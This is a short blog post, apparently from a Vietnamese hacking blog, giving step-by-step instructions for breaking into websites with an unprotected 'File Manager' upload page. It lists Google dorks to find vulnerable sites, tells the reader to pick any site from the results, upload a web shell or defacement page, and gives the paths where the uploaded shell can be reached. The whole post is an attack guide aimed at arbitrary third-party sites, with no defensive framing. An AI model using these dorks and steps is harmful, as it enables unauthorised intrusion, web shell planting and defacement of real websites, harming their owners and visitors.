Trang

"File Manager" Remote Shell and Deface Upload Vulnerability.

Following is the vulnerability to remotly upload your shell or deface on a vulnerable website.

Google Dorks:
inurl:/filemanager/userfiles/ filetype:pdf
inurl:/filemanager/index.html
Vulnerable URL:
http://www.site.com/filemanager/index.html
Now, google the dork and select any website from the search result.
When you will select any website, the URL will be as
http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
Now delete the text after filemanager. Now after deleteing the text URL will be
http://www.site.com/filemanager/
You will get a upload option, upload your shell or deface there.
Your will will be uploaded in Userfiles directory. z
To view your shell visit the below mentioned URLs:
http://www.site.com/UserFiles/Shell.php
http://www.site.com/UserFiles/deface.html
or 
http://www.site.com/UserFiles/directory/Shell.php
http://www.site.com/UserFiles/directory/deface.html

Chú Ý:

Coppy phải ghi rõ nguồn Dương-UG Blog's
 

0 nhận xét:

Đăng nhận xét

:) :( :)) :(( =))

Copyright © Dương-UG Blog's - Nguyễn Bình Dương